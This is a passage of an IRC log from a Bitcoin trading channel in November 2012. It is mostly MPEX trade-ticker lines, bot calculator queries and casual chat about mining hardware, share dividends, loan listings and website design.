about people being paid to troll him or something Nov 28 20:11:07 gigavps: heh, notice your shares are still selling? Nov 28 20:11:12 XD Nov 28 20:11:15 [MPEX] [S.MPOE] 14750 @ 0.00052699 = 7.7731 BTC [+] Nov 28 20:11:16 [MPEX] [S.MPOE] 1150 @ 0.00053452 = 0.6147 BTC [+] Nov 28 20:11:17 0.00000001 Nov 28 20:11:37 don't question the rational market's pricing Nov 28 20:11:46 that's redonkulous Nov 28 20:12:13 gigavps: it's mostly because mircea_popescu doesn't think he should have to file a claim Nov 28 20:12:23 i don't think he even filed a claim on glbse Nov 28 20:12:28 or he doesn't want to Nov 28 20:12:39 then he doesnt get anything Nov 28 20:12:48 i'm trying to make it easier, but these things take time Nov 28 20:13:10 [MPEX] [S.MPOE] 11900 @ 0.00052469 = 6.2438 BTC [-] Nov 28 20:13:11 yeah, he cited a bunch of legal concersn and figured the cost of finding out was too high Nov 28 20:13:31 and I don't think it has much to do whith what you're doing gigavps Nov 28 20:13:37 :( Nov 28 20:14:02 well, i'm still running over 200Gh and i have all of the coins Nov 28 20:14:08 for back payments Nov 28 20:14:26 He thinks that the underlying assed went away, and what your are doing is making a relacemnet Nov 28 20:14:34 *replacement Nov 28 20:14:49 *asset (jeez, spelling) Nov 28 20:15:04 well, teramining was supposed to replace gigamining at some point Nov 28 20:15:10 if the equipment ever arrives Nov 28 20:15:28 You didn’t get it in Oct? Nov 28 20:15:30 :) Nov 28 20:15:38 that actually relates to his position, f.giga.etf would never move to teramining Nov 28 20:15:56 so why would it move to the new gigamining Nov 28 20:16:11 I'm guessing they deliver in Jan sometime. Nov 28 20:16:15 Doffx if i had all of my asic equipment, i'd be doing things like Nov 28 20:16:19 it was strictly an 'old gigamining' asset Nov 28 20:16:22 muhahahahahahahaha Nov 28 20:16:26 all the time Nov 28 20:16:30 haha Nov 28 20:16:32 lol Nov 28 20:16:46 I think I'm done with Bitcoin Mining, not sure though. Nov 28 20:16:55 gigavps: arn't you first in line for the BFL asics? Nov 28 20:17:04 Depends on if I get my SDICE back and what they are worth Nov 28 20:17:23 Doffx: people are buying s.dice for nearly .0034 now Nov 28 20:17:38 http://live.coinbr.com/?mpsic=S.DICE Nov 28 20:17:42 Thats good, I bought mine at .0030 Nov 28 20:17:51 Around that anyhow Nov 28 20:17:52 smickles why would you even ask a question like that Nov 28 20:18:30 gigavps: heh, i dunno, seemed like it might satisfy curiosity, and i hadn't paid much attention to things Nov 28 20:18:54 [MPEX] [S.MPOE] 2345 @ 0.00052785 = 1.2378 BTC [+] Nov 28 20:18:56 [MPEX] [S.MPOE] 13063 @ 0.0005279 = 6.896 BTC [+] Nov 28 20:19:03 I wouldnt mind 2 Asic devices, I just cant afford them. Nov 28 20:19:28 Doffx: you should wait until the dividend for s.dice, it's looking like a good one this month Nov 28 20:19:28 I'm close to having enough for one however. Nov 28 20:19:41 I cant sell it anyhow Nov 28 20:19:51 Or do anything with it, its that Glsbe passthrough Nov 28 20:20:01 oh, too bad Nov 28 20:20:19 I think DeaDTerra will make good on it once he gets the Info though. Nov 28 20:20:47 I'd use Mpex if the account was free-1BTC Nov 28 20:21:01 30 is insanity so was 20 imo. Nov 28 20:21:26 Doffx: what about coinbr? Nov 28 20:21:56 Im not going to use some 3rd party site ever again. Nov 28 20:22:04 heh, ok Nov 28 20:22:18 apparently my service is cheaper than coinbr anyway Nov 28 20:22:28 [MPEX] [S.MPOE] 2345 @ 0.00052759 = 1.2372 BTC [-] Nov 28 20:22:29 [MPEX] [S.MPOE] 737 @ 0.0005279 = 0.3891 BTC [+] Nov 28 20:22:30 [MPEX] [S.MPOE] 1718 @ 0.00053452 = 0.9183 BTC [+] Nov 28 20:22:35 Thats an Idea Nov 28 20:22:54 I can trnsfer my SDICE to you and have you manage them for me once I get them back. Nov 28 20:23:07 for your fee price of course Nov 28 20:23:21 certainly Nov 28 20:24:32 I'll convert your sdgpt (or whatever it was) to s.dice right now for .5 btc on the bitcoin and a signed statement from deadterra Nov 28 20:24:45 Im happy I got ROI on my FPGA devices at least. Nov 28 20:24:59 I'm even currently, anything from this point is actual profit. Nov 28 20:25:06 good deal there on the fpgas Nov 28 20:25:31 well, you still have to beat electricity tho, right/ Nov 28 20:25:35 ? Nov 28 20:25:45 They dont use anything really Nov 28 20:25:56 3 Units is less than 1 lightbulb Nov 28 20:26:05 at today's price/diff that's true Nov 28 20:26:18 I'm on a fixed plan, I pay 54 a month regardless of usage. Nov 28 20:26:45 have you calculated what diff and price where it becomes a concern? Nov 28 20:26:48 Im in NW Washington too our power is cheap Nov 28 20:27:22 No I have not. Nov 28 20:27:58 If I guess it would be around double what it is now for them to be negative to run. Nov 28 20:28:46 that sounds like nice profit for now, gratz :) Nov 28 20:30:23 Thanks! Nov 28 20:31:05 [MPEX] [S.MPOE] 7800 @ 0.00052946 = 4.1298 BTC [-] Nov 28 20:31:05 [MPEX] [S.MPOE] 15150 @ 0.00053452 = 8.098 BTC [+] Nov 28 20:31:05 Now I have to make the decision to save it for asic or spend it on things I need to fix the house, or silver. Nov 28 20:31:43 do you own the house? Nov 28 20:32:34 as if i know anything about the situation, but if you own the house, spend at least some of it on the house Nov 28 20:32:55 it's you castle, man ;) Nov 28 20:36:45 smickles do you live in the desert? Nov 28 20:36:52 pretty much Nov 28 20:36:58 dats awesome Nov 28 20:37:10 especially coming from the midwest, this is as much desert as i want Nov 28 20:37:46 tucson az, it's like 75Â out right now Nov 28 20:37:58 0 humidity ;) Nov 28 20:38:08 sunny, gentle breeze, yeah, no humidity Nov 28 20:38:16 plenty of shade in the city Nov 28 20:38:25 we should just all move to romania and stay with mircea Nov 28 20:38:44 heh, i envision he has a little biltmore mansion Nov 28 20:38:50 plenty of rooms for guests Nov 28 20:39:22 people don't believe me when I say you should begin prepping for retirement at an early age so you have more leverage while you still have energy to care Nov 28 20:39:45 i wish i could put more to retirement Nov 28 20:40:00 I hope my wife decides to go for the full military pension Nov 28 20:40:12 with your btc abilities you will likely have that leverage before you are 30 methinks Nov 28 20:41:37 your wife is military: neat Nov 28 20:41:52 how do I know you're not spy? Nov 28 20:43:24 thestringpuller: http://blog.smickles.com/bitcoin/bitcoin-finance/a-good-month-for-s-dice-shareholders-in-the-making/#update_28nov12 Nov 28 20:43:37 thestringpuller: how do you know anyone isn't a spy? Nov 28 20:43:55 whoooaaa Nov 28 20:43:58 that blew my mind Nov 28 20:44:31 try this logically, ask falsifiable questions that are about positive claims Nov 28 20:44:47 ;;halfreward Nov 28 20:44:47 Estimated time of bitcoin block reward halving: Fri Nov 25 22:54:50 2016 UTC | Time remaining: 3 years, 51 weeks, 6 days, 4 hours, 10 minutes, and 0 seconds. Nov 28 20:45:02 sounds like discrete math Nov 28 20:45:04 lol Nov 28 20:45:33 I still feel like S.DICE is overvalued for the value it provides to the bitcoin world. Nov 28 20:45:53 heh, i just mean, ask are you a spy? if I give a suspect answer, ask for justification, and question the justification Nov 28 20:45:58 it isn't valued in the value it provides to the bitcoin world Nov 28 20:46:04 its valued in the dividends Nov 28 20:46:44 if you ask a spy straight up they have to tell you, its against the geneva convention and the outer space treaty ;) Nov 28 20:47:00 yeah, if the pattern holds, an instant >1.5% gain is something everyone should go for Nov 28 20:47:18 [MPEX] [S.MPOE] 2345 @ 0.00052867 = 1.2397 BTC [-] Nov 28 20:47:20 [MPEX] [S.MPOE] 7695 @ 0.00052848 = 4.0667 BTC [-] Nov 28 20:47:40 thestringpuller: also, ideally (for the gov't) any spy would be able to convince you they are not a spy Nov 28 20:47:51 mpex is valued in the entertainment value of mpoe-pr arguing valuation on the forum with josh Nov 28 20:47:56 ^ Nov 28 20:47:58 true Nov 28 20:48:09 MPOE provides rock solid options that aren't scams Nov 28 20:48:17 albeit the bot is expensive as shit Nov 28 20:48:19 but porn! Nov 28 20:48:22 it provides a valuable service Nov 28 20:48:24 PORN! Nov 28 20:48:33 PC at that! Nov 28 20:48:37 yes because naked women is a bad thing? Nov 28 20:49:01 sexy naruto cosplay is the nectar of the gods Nov 28 20:49:06 ;;bc,gen 2200000 Nov 28 20:49:07 The expected generation output, at 2200000 Khps, given current difficulty of 3438908.9601591 , is 0.643466419996 BTC per day and 0.0268111008332 BTC per hour. Nov 28 20:50:35 wat.. still profitable Nov 28 20:51:13 that calc is broken though looks like its still at 50/block Nov 28 20:51:42 [MPEX] [S.MPOE] 2345 @ 0.00052854 = 1.2394 BTC [+] Nov 28 20:51:43 [MPEX] [S.MPOE] 17105 @ 0.00052848 = 9.0397 BTC [-] Nov 28 20:51:45 [MPEX] [S.MPOE] 1287 @ 0.00052469 = 0.6753 BTC [-] Nov 28 20:51:46 [MPEX] [S.MPOE] 23363 @ 0.00052401 = 12.2424 BTC [-] Nov 28 20:52:10 how many IRL companies pay 19% dividend yeild? ... 9 Nov 28 20:52:38 dub: use something like http://bitcoinx.com/profit/ Nov 28 20:52:41 and adjust it Nov 28 20:52:59 i've always used http://bitcoinx.com/profit/ Nov 28 20:53:03 er Nov 28 20:53:08 smickles: but a lot more money is invested in IRL companies Nov 28 20:53:12 http://tpbitcalc.appspot.com Nov 28 20:53:13 [MPEX] [S.MPOE] 1801 @ 0.00052401 = 0.9437 BTC [-] Nov 28 20:53:14 [MPEX] [S.MPOE] 4519 @ 0.00052399 = 2.3679 BTC [-] Nov 28 20:53:15 [MPEX] [S.MPOE] 12949 @ 0.00052387 = 6.7836 BTC [-] Nov 28 20:53:17 [MPEX] [S.MPOE] 3485 @ 0.00052375 = 1.8253 BTC [-] Nov 28 20:54:02 so you're more likely to make money on the price movement of asset, than the dividends it pays Nov 28 20:54:13 thestringpuller: there's a lot of differences, it's just neat to compare sometimes Nov 28 20:54:40 i feel like companies who pay dividends are wasting their money, I used to not think that though Nov 28 20:55:08 why give money to your shareholders when you can invest it in something to grow the company, shareholders aren't "guarenteed" Nov 28 20:56:38 hmm not so profitable Nov 28 20:56:49 -0.02/day Nov 28 20:57:31 probably worth leaving GPUs running in anticipation of higher btc prices though Nov 28 20:58:55 smickles: have you ever played GTA-IV? Nov 28 20:59:37 <3 gta4 Nov 28 20:59:50 thestringpuller: a little, but I don't play games too often anymore. Nov 28 20:59:59 I like the commentary of the American Dream. Nov 28 21:00:15 Like the question arises, how does one obtain it? Nov 28 21:01:03 by killing the hooker and getting your money back Nov 28 21:01:13 that doesn't really get you much cash though Nov 28 21:01:21 your big payoff is when you rob a bank Nov 28 21:01:50 just do like people born into money do and use the cheat codes Nov 28 21:01:56 lol Nov 28 21:02:19 lol Nov 28 21:02:21 there is a wink to the government conspiring with criminal organizations though Nov 28 21:02:37 the anti-terrorist organization tries to cover up one of the mob families' crimes Nov 28 21:08:32 [MPEX] [S.MPOE] 2345 @ 0.00053438 = 1.2531 BTC [+] Nov 28 21:08:33 [MPEX] [S.MPOE] 4806 @ 0.00053452 = 2.5689 BTC [+] Nov 28 21:08:35 [MPEX] [S.MPOE] 17450 @ 0.00053456 = 9.3281 BTC [+] Nov 28 21:08:35 [MPEX] [S.MPOE] 5424 @ 0.00053458 = 2.8996 BTC [+] Nov 28 21:17:47 [MPEX] [S.MPOE] 2345 @ 0.0005343 = 1.2529 BTC [-] Nov 28 21:17:49 [MPEX] [S.MPOE] 4021 @ 0.00053458 = 2.1495 BTC [+] Nov 28 21:17:50 [MPEX] [S.MPOE] 1000 @ 0.00053464 = 0.5346 BTC [+] Nov 28 21:17:51 [MPEX] [S.MPOE] 23134 @ 0.00053465 = 12.3686 BTC [+] Nov 28 21:30:59 [MPEX] [S.MPOE] 3700 @ 0.00053449 = 1.9776 BTC [-] Nov 28 21:35:22 [MPEX] [S.MPOE] 19050 @ 0.00053449 = 10.182 BTC [-] Nov 28 21:37:18 [MPEX] [S.MPOE] 7650 @ 0.00053449 = 4.0888 BTC [-] Nov 28 21:37:19 [MPEX] [S.MPOE] 2150 @ 0.00053465 = 1.1495 BTC [+] Nov 28 21:40:27 [MPEX] [S.MPOE] 2345 @ 0.00053217 = 1.2479 BTC [-] Nov 28 21:40:29 [MPEX] [S.MPOE] 2355 @ 0.00053187 = 1.2526 BTC [-] Nov 28 21:46:44 http://i.imgur.com/jDF04.gif Nov 28 21:46:58 [MPEX] [S.MPOE] 2345 @ 0.00053219 = 1.248 BTC [+] Nov 28 21:46:59 [MPEX] [S.MPOE] 11945 @ 0.00053187 = 6.3532 BTC [-] Nov 28 21:47:01 [MPEX] [S.MPOE] 3510 @ 0.00053165 = 1.8661 BTC [-] Nov 28 21:47:18 lol Nov 28 21:50:37 haha Nov 28 21:52:47 [MPEX] [S.MPOE] 2345 @ 0.00053456 = 1.2535 BTC [+] Nov 28 21:52:49 [MPEX] [S.MPOE] 2764 @ 0.00053465 = 1.4778 BTC [+] Nov 28 21:52:50 [MPEX] [S.MPOE] 18341 @ 0.00053469 = 9.8067 BTC [+] Nov 28 22:08:53 [MPEX] [S.MPOE] 527 @ 0.00053443 = 0.2816 BTC [-] Nov 28 22:13:34 [MPEX] [S.MPOE] 1818 @ 0.00053443 = 0.9716 BTC [-] Nov 28 22:13:36 [MPEX] [S.MPOE] 4182 @ 0.00053469 = 2.2361 BTC [+] Nov 28 22:24:27 [MPEX] [S.MPOE] 2345 @ 0.00053181 = 1.2471 BTC [-] Nov 28 22:24:28 [MPEX] [S.MPOE] 4790 @ 0.00053165 = 2.5466 BTC [-] Nov 28 22:24:30 [MPEX] [S.MPOE] 14400 @ 0.00052815 = 7.6054 BTC [-] Nov 28 22:24:31 [MPEX] [S.MPOE] 16718 @ 0.000526 = 8.7937 BTC [-] Nov 28 22:24:32 [MPEX] [S.MPOE] 7647 @ 0.0005256 = 4.0193 BTC [-] Nov 28 22:31:09 [MPEX] [S.MPOE] 2345 @ 0.00053457 = 1.2536 BTC [+] Nov 28 22:31:10 [MPEX] [S.MPOE] 7455 @ 0.00053469 = 3.9861 BTC [+] Nov 28 22:32:44 [MPEX] [S.MPOE] 2345 @ 0.00053147 = 1.2463 BTC [-] Nov 28 22:32:46 [MPEX] [S.MPOE] 14905 @ 0.00053122 = 7.9178 BTC [-] Nov 28 22:37:36 and it should start looking fine: http://www.namworld.net/ Nov 28 22:37:43 or at least better than before Nov 28 22:38:05 hm Nov 28 22:38:37 i dont know any successful web entity that would go along valid html and css Nov 28 22:40:00 eh, what? Nov 28 22:41:44 [MPEX] [S.MPOE] 2345 @ 0.00053458 = 1.2536 BTC [+] Nov 28 22:41:44 [MPEX] [S.MPOE] 9455 @ 0.00053469 = 5.0555 BTC [+] Nov 28 22:42:26 the weight of w3c validity link in your footer Nov 28 22:42:33 the value of it is nil Nov 28 22:42:36 perhaps even negative Nov 28 22:43:18 Ah, yes. It's included by default in the footer for all my websites. Nov 28 22:43:28 horrible. Nov 28 22:44:38 take mpex for example... Nov 28 22:45:27 and google, amazon, ebay, bing ... while you are at it :) Nov 28 22:45:29 i think they got the cherry truck award for most html validation errors last year. i forget who was so enthused about that Nov 28 22:45:43 neofutur Nov 28 22:45:59 "how can you trust a site with w3c errors!" Nov 28 22:46:07 impossibru Nov 28 22:47:21 [MPEX] [S.MPOE] 5017 @ 0.00053469 = 2.6825 BTC [+] Nov 28 22:47:21 [MPEX] [S.MPOE] 20683 @ 0.00053472 = 11.0596 BTC [+] Nov 28 22:48:27 Eh well. Nov 28 22:49:34 About the background noise, should it be lighter or darker you think? Nov 28 22:50:41 no bitcoin is mentioned Nov 28 22:51:16 Thank you, thank you. Nov 28 22:51:26 I'm working on the website... Nov 28 22:51:45 I'll implement a footer with payment methods eventually. Nov 28 22:53:06 Maybe a nice little set of grayscale icons. Nov 28 22:53:21 But for now, background. Nov 28 22:54:37 and back to bitcoin related stuff, i have put 100btc in hands of my forex trading bot, ill make an update when account is blown :) Nov 28 22:56:09 and if it doesn't blow but make money, donate the bot to me, right? Nov 28 22:56:53 accually theres about 500btc that wants to go into it atm Nov 28 22:57:01 ill allow it with 20% cut Nov 28 22:57:25 but lets see how it does first Nov 28 23:01:23 [MPEX] [S.MPOE] 2345 @ 0.00053132 = 1.2459 BTC [-] Nov 28 23:01:25 [MPEX] [S.MPOE] 45 @ 0.00053122 = 0.0239 BTC [-] Nov 28 23:01:26 [MPEX] [S.MPOE] 24000 @ 0.00053096 = 12.743 BTC [-] Nov 28 23:01:27 [MPEX] [S.MPOE] 5060 @ 0.0005256 = 2.6595 BTC [-] Nov 28 23:02:38 Hmm, interesting. Well certainly update us then. Nov 28 23:04:15 ill make a chan to stream bot trades into it soonish Nov 28 23:04:40 wait you're not a scam anymore? Nov 28 23:05:21 once milk, always milk. Nov 28 23:05:51 unless custard Nov 28 23:09:11 [MPEX] [S.MPOE] 2345 @ 0.00052586 = 1.2331 BTC [+] Nov 28 23:09:12 [MPEX] [S.MPOE] 5643 @ 0.0005256 = 2.966 BTC [-] Nov 28 23:09:14 [MPEX] [S.MPOE] 9012 @ 0.00052556 = 4.7363 BTC [-] Nov 28 23:15:09 [MPEX] [S.MPOE] 18688 @ 0.00052556 = 9.8217 BTC [-] Nov 28 23:15:11 [MPEX] [S.MPOE] 2112 @ 0.00052375 = 1.1062 BTC [-] Nov 28 23:19:33 [MPEX] [S.MPOE] 2345 @ 0.00053338 = 1.2508 BTC [+] Nov 28 23:19:35 [MPEX] [S.MPOE] 9505 @ 0.00053372 = 5.073 BTC [+] **** ENDING LOGGING AT Wed Nov 28 23:40:06 2012 **** BEGIN LOGGING AT Wed Nov 28 23:40:32 2012 Nov 28 23:40:56 -NickServ- You failed to identify in time for the nickname mircea_popescu **** ENDING LOGGING AT Wed Nov 28 23:43:08 2012 **** BEGIN LOGGING AT Wed Nov 28 23:43:38 2012 Nov 28 23:45:27 [MPEX] [S.MPOE] 1285 @ 0.00052394 = 0.6733 BTC [-] Nov 28 23:45:28 [MPEX] [S.MPOE] 8414 @ 0.00052375 = 4.4068 BTC [-] Nov 29 00:05:33 so now lurk's loans aren't for gambling anymore, now he's gonna pay off a car note: https://btcjam.com/listings/738 Nov 29 00:07:35 ughm Nov 29 00:07:36 [MPEX] [S.MPOE] 2345 @ 0.00052383 = 1.2284 BTC [+] Nov 29 00:07:37 [MPEX] [S.MPOE] 17389 @ 0.00052375 = 9.1075 BTC [-] Nov 29 00:07:38 [MPEX] [S.MPOE] 7350 @ 0.0005233 = 3.8463 BTC [-] Nov 29 00:07:39 [MPEX] [S.MPOE] 1516 @ 0.00052225 = 0.7917 BTC [-] Nov 29 00:07:52 how quickly they grow up Nov 29 00:08:09 it seems like only yesterday he was a wee tyke in the throes of gambling addiction. Nov 29 00:08:26 oh here we go, everyone looking for a deal https://btcjam.com/listings/703 Nov 29 00:08:50 I should start a btcjam analysis newsletter/jokebook Nov 29 00:10:01 [MPEX] [S.MPOE] 2345 @ 0.0005294 = 1.2414 BTC [+] Nov 29 00:10:02 [MPEX] [S.MPOE] 405 @ 0.00052945 = 0.2144 BTC [+] Nov 29 00:10:30 might be a good idea. Nov 29 00:10:45 "Pigeon finance" Nov 29 00:11:42 I am willing to buy a pick up truck with accommodation to carry public passenger. Daily revenue is a minimum of $ 80 US dollar roughly. Nov 29 00:11:51 Payment Nov 29 00:11:51 BTC 691.96247 Nov 29 00:11:51 every 1st of the month Nov 29 00:12:06 ;;calc 80 * 30 / 12 / 691 Nov 29 00:12:06 0.289435600579 Nov 29 00:12:08 he must have a decimal error Nov 29 00:12:17 o hey, his gross is almost 1/3 of his debt service. Nov 29 00:12:25 i doubt it. haiti is poor. Nov 29 00:12:30 [MPEX] [S.MPOE] 2345 @ 0.0005292 = 1.241 BTC [-] Nov 29 00:12:32 [MPEX] [S.MPOE] 38355 @ 0.00052945 = 20.3071 BTC [+] Nov 29 00:12:42 and finally https://btcjam.com/listings/709 Nov 29 00:13:36 [MPEX] [S.MPOE] 2345 @ 0.00052426 = 1.2294 BTC [-] Nov 29 00:13:37 [MPEX] [S.MPOE] 12800 @ 0.00052391 = 6.706 BTC [-] Nov 29 00:13:39 anyway. the sooner that pos goes away the better. Nov 29 00:16:03 [MPEX] [S.MPOE] 2345 @ 0.00052913 = 1.2408 BTC [+] Nov 29 00:16:04 [MPEX] [S.MPOE] 590 @ 0.00052945 = 0.3124 BTC [+] Nov 29 00:16:06 [MPEX] [S.MPOE] 788 @ 0.00053004 = 0.4177 BTC [+] Nov 29 00:18:23 wat Nov 29 00:19:34 [MPEX] [S.MPOE] 5350 @ 0.00053193 = 2.8458 BTC [+] Nov 29 00:19:43 btcjam Nov 29 00:20:32 http://ziggap.com/prop/crunching-numbers.html Nov 29 00:21:08 pigeons is http://forum.litecoin.net/index.php/topic,624.75.html supposed to be me ? Nov 29 00:24:13 litecoin forums! Nov 29 00:25:32 all the trolling of bitcoin, half the humor, .005 the value! Nov 29 00:25:39 [MPEX] [S.MPOE] 6909 @ 0.00053193 = 3.6751 BTC [+] Nov 29 00:27:33 ima hire a rabbit to pr me there. Nov 29 00:27:58 ;;calc 2^16 Nov 29 00:27:58 Error: Something in there wasn't a valid number. Nov 29 00:28:15 ;;calc 2*2*2*2*2*2 Nov 29 00:28:15 64 Nov 29 00:28:27 ;;calc 2*2*2*2*2*2*2*2*2*2*2*2 Nov 29 00:28:27 4096 Nov 29 00:28:30 ;;calc 2*2*2*2*2*2*2*2*2*2 Nov 29 00:28:31 1024 Nov 29 00:28:34 ;;calc 2*2*2*2*2*2*2*2*2 Nov 29 00:28:34 512 Nov 29 00:28:37 ;;calc 2*2*2*2*2*2*2*2*2*2 Nov 29 00:28:38 1024 Nov 29 00:28:39 really Nov 29 00:28:40 ugh Nov 29 00:28:42 oh well Nov 29 00:28:54 thank you gribble Nov 29 00:29:42 ;;calc 2**16 Nov 29 00:29:42 65536 Nov 29 00:30:10 all my textures have to be a power of 2 since my gfx card isn't DirectX 10 compatible Nov 29 00:30:13 f*ing microsoft Nov 29 00:30:26 thestringpuller 2**16 Nov 29 00:30:51 ;;calc [[1,0],[0,1]] Nov 29 00:30:52 Error: "1,0" is not a valid command. Nov 29 00:30:56 meh Nov 29 00:31:00 no matrix operations here Nov 29 00:31:59 [] is for something else Nov 29 00:32:19 ;;calc 100*[calc 2**16] Nov 29 00:32:19 6553600 Nov 29 00:32:33 it's cool, it would be neat to have wolfram alpha like calculations for linear algebra operations Nov 29 00:32:46 from an irc channel/terminal Nov 29 00:32:47 not in a bot's simple calc function though Nov 29 00:32:53 i know :) Nov 29 00:32:58 well, there are wolfram alpha bots though Nov 29 00:32:58 one can dream though no? Nov 29 00:33:02 that just make a request to WA Nov 29 00:33:23 and spit out the result after some light parsing and formatting Nov 29 00:34:27 [MPEX] [S.MPOE] 15350 @ 0.00053193 = 8.1651 BTC [+] Nov 29 00:35:01 so basically... bfl had a bad run, basic is delayed for unspecified reasons till mid january Nov 29 00:35:06 is anyone even nominally left in the asic race ? Nov 29 00:35:37 asicminer are quiet afaik Nov 29 00:36:14 Yeah, Smickles I own a house, I'm going to sell it and go rent however. Sorry I had stepped out a couple hours so this reply is super delayed. Nov 29 00:37:01 ;;calc 1024/2 Nov 29 00:37:01 512 Nov 29 00:37:02 sell it for btc! Nov 29 00:37:02 512 Nov 29 00:37:03 lol Nov 29 00:37:19 i saw the house in atlanta that is being sold for btc Nov 29 00:37:33 link? Nov 29 00:37:42 search the forums lol Nov 29 00:37:45 I'm coding Nov 29 00:37:54 and using gribble as my arithmetic bitch Nov 29 00:39:24 pigeons https://bitcointalk.org/index.php?topic=128267.0 Nov 29 00:39:29 I WIN Nov 29 00:41:41 break even on bfl fpga single is ~12M diff with .22 power Nov 29 00:43:25 [MPEX] [S.MPOE] 1568 @ 0.00053193 = 0.8341 BTC [+] Nov 29 00:44:06 dub so ? Nov 29 00:44:51 i want to make a big bet. i'm just using your money as a way to contribute interest to the community. if i lose of course i'll still pay you back in full and on time Nov 29 00:44:52 just reading scrollback Nov 29 00:47:37 [MPEX] [S.MPOE] 2345 @ 0.00052951 = 1.2417 BTC [-] Nov 29 00:47:39 [MPEX] [S.MPOE] 21850 @ 0.00052928 = 11.5648 BTC [-] Nov 29 00:47:40 [MPEX] [S.MPOE] 11654 @ 0.00052707 = 6.1425 BTC [-] Nov 29 00:51:13 [MPEX] [S.MPOE] 2345 @ 0.00052728 = 1.2365 BTC [+] Nov 29 00:51:14 [MPEX] [S.MPOE] 9555 @ 0.00052707 = 5.0362 BTC [-] Nov 29 00:53:09 awwww yeah Nov 29 00:53:56 ;;ticker Nov 29 00:53:57 BTCUSD ticker | Best bid: 12.33000, Best ask: 12.34793, Bid-ask spread: 0.01793, Last trade: 12.34793, 24 hour volume: 30724.00121881, 24 hour low: 12.08000, 24 hour high: 12.40712, 24 hour vwap: 12.27315 Nov 29 00:54:38 [MPEX] [S.MPOE] 2345 @ 0.00053127 = 1.2458 BTC [+] Nov 29 00:54:40 [MPEX] [S.MPOE] 21732 @ 0.00053149 = 11.5503 BTC [+] Nov 29 00:54:41 [MPEX] [S.MPOE] 1000 @ 0.0005333 = 0.5333 BTC [+] Nov 29 00:54:41 [MPEX] [S.MPOE] 12600 @ 0.00053331 = 6.7197 BTC [+] Nov 29 00:54:43 [MPEX] [S.MPOE] 1000 @ 0.00053471 = 0.5347 BTC [+] Nov 29 00:54:44 [MPEX] [S.MPOE] 11515 @ 0.00053472 = 6.1573 BTC [+] Nov 29 00:54:45 [MPEX] [S.MPOE] 1504 @ 0.00053511 = 0.8048 BTC [+] Nov 29 01:02:52 [MPEX] [S.MPOE] 2345 @ 0.00052709 = 1.236 BTC [-] Nov 29 01:02:53 [MPEX] [S.MPOE] 24155 @ 0.00052707 = 12.7314 BTC [-] Nov 29 01:10:22 [MPEX] [S.MPOE] 2345 @ 0.0005308 = 1.2447 BTC [+] Nov 29 01:10:24 [MPEX] [S.MPOE] 29705 @ 0.00053087 = 15.7695 BTC [+] Nov 29 01:11:21 [MPEX] [S.MPOE] 2345 @ 0.00053067 = 1.2444 BTC [-] Nov 29 01:11:23 [MPEX] [S.MPOE] 4751 @ 0.00053087 = 2.5222 BTC [+] Nov 29 01:14:29 [MPEX] [S.MPOE] 7404 @ 0.0005331 = 3.9471 BTC [+] Nov 29 01:14:30 Well, seems like F.GIGA.ETF is going away in a bit less than 3 days. Nov 29 01:14:31 [MPEX] [S.MPOE] 2345 @ 0.00052718 = 1.2362 BTC [-] Nov 29 01:14:32 [MPEX] [S.MPOE] 13518 @ 0.00052707 = 7.1249 BTC [-] Nov 29 01:18:55 indeed. Nov 29 01:25:10 Doffx: np :) Nov 29 01:25:57 tbh im quite impressed with the bitcoin exchange market Nov 29 01:26:02 no halving tremors or anything Nov 29 01:26:13 Thats why I may use it for those repairs, I have a lot I want to fix before I sell it. Nov 29 01:26:50 Doing the math over the next 7 years we would save a considerable amount not owning a home, plus I want to be debt free asap. Nov 29 01:27:50 [MPEX] [S.MPOE] 2345 @ 0.0005338 = 1.2518 BTC [+] Nov 29 01:27:52 [MPEX] [S.MPOE] 9500 @ 0.00053393 = 5.0723 BTC [+] Nov 29 01:27:53 [MPEX] [S.MPOE] 8696 @ 0.00053511 = 4.6533 BTC [+] Nov 29 01:27:54 [MPEX] [S.MPOE] 7471 @ 0.00053519 = 3.9984 BTC [+] Nov 29 01:27:55 [MPEX] [S.MPOE] 1000 @ 0.00053519 = 0.5352 BTC [+] Nov 29 01:27:56 [MPEX] [S.MPOE] 1107 @ 0.0005352 = 0.5925 BTC [+] Nov 29 01:33:08 [MPEX] [S.MPOE] 11350 @ 0.0005352 = 6.0745 BTC [+] Nov 29 01:37:31 [MPEX] [S.MPOE] 8750 @ 0.00053143 = 4.65 BTC [-] Nov 29 01:37:33 [MPEX] [S.MPOE] 2345 @ 0.00052733 = 1.2366 BTC [-] Nov 29 01:37:34 [MPEX] [S.MPOE] 568 @ 0.00052707 = 0.2994 BTC [-] Nov 29 01:37:34 [MPEX] [S.MPOE] 7987 @ 0.00052462 = 4.1901 BTC [-] Nov 29 01:39:08 [MPEX] [S.MPOE] 2345 @ 0.00053505 = 1.2547 BTC [+] Nov 29 01:39:10 [MPEX] [S.MPOE] 13643 @ 0.0005352 = 7.3017 BTC [+] Nov 29 01:39:11 [MPEX] [S.MPOE] 17212 @ 0.00053537 = 9.2148 BTC [+] Nov 29 01:44:47 [MPEX] [S.MPOE] 2345 @ 0.00052466 = 1.2303 BTC [-] Nov 29 01:44:49 [MPEX] [S.MPOE] 4355 @ 0.00052462 = 2.2847 BTC [-] Nov 29 01:52:54 well, i actually speculated on that halving will be non-event for xchange rate Nov 29 01:53:50 did split on C120T and sold both calls and puts Nov 29 01:54:13 we'll see the result tomorrow, but looks very good Nov 29 01:54:44 [MPEX] [S.MPOE] 2345 @ 0.00052704 = 1.2359 BTC [+] Nov 29 01:54:45 [MPEX] [S.MPOE] 27405 @ 0.00052702 = 14.443 BTC [-] Nov 29 01:55:28 oh, and just met amir taaki in person.. interesting guy, but i don't understand him much :/ Nov 29 01:55:44 It seems to me it would be simple supply and demand and I think there is still a lot of supply, I would think it would take a few months to see the block half reduce the supply so the price goes up Nov 29 01:56:07 but I'm just guessing Nov 29 01:56:54 aka genjix Nov 29 01:57:35 Doffx, yes i see lots of inertia on the btc market lately too Nov 29 01:58:28 Oh that's who genjix is? Hes with Intersango now? Nov 29 01:59:02 did not ask him Nov 29 01:59:44 Amir Taaki developed the original inspiration for Intersango, a site named Britcoin to bring bitcoin to the UK. We are pleased to have him with us working on Intersango. Additionally, he is heavily involved with developing bitcoin and is the maintainer of libbitcoin. Nov 29 02:00:03 he's doing bitcoin programming workshop in bratislava this weekend Nov 29 02:01:17 Hes listed on the About page at Intersango. Nov 29 02:01:55 and i'm torn much whether to go...i explained that i'm hard of hearing but they did not think a way to help me Nov 29 02:02:05 so i Nov 29 02:02:16 m probably better with studying writings Nov 29 02:03:29 today i was reminded that actually i'd have problems to understand many of you if we met in person... Nov 29 